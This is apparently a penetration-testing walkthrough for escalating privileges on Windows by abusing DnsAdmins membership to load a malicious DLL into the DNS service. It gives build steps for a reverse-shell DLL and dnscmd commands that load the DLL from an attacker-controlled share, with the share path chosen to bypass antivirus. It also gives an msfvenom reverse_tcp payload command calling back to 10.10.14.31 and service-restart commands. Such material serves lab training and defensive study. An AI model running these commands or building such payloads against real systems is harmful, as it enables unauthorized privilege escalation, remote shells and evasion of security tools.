Malicious DLL Injection
Overview #
If low privileged user is a member of DnsAdmins
, attacker can inject a malicuous DLL in DNS service and achieve privilege escalation.
Environment Setup and Requirements #
- Low privileged user must be a member of
DnsAdmins
- Low privileged user must be able to start and stop DNS service
- Separate attacker windows machine for compiling DLL
Steps #
- Download this DLL DNS plugin and open it in attacker windows machine
- Get this reverse shell, update it with your IP/PORT settings, and put it under sources. Ensure to add
#include "stdafx.h"
at the top.
- Create this header file
- Update the main code. These changes below will create a new thread which help prevent crashing the DNS service.
- Change to “Release” and start building
- DLL should be generated similar to this path. Transfer it to victim machine.
- Open netcat listener on attacker
- Inside victim, load the DLL into DNS service and restart DNS to activate it. In this step, we are loading the DLL from attacker share to bypass some AV.
# load
dnscmd /config /serverlevelplugindll \\10.10.14.31\share\Win32Project1.dll
# verify
dnscmd /config /serverlevelplugindll \\10.10.14.31\share\Win32Project1.dll
# stop dns
cmd /c sc stop dns
# start dns
cmd /c sc start dns
Troubleshooting #
- For some reason, DLL generated by msfvenom doesn’t work. Seems its crashing the DNS service.
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.31 LPORT=4444 -f dll > evil.dll
- If you encounter MFC errors during build, install the MFC libraries from Visual Studio Installer
- If you encounter
revshell: must return a value
, add a return value at the end ofrev.cpp
// [..redacted...]
WSACleanup();
return 0;
}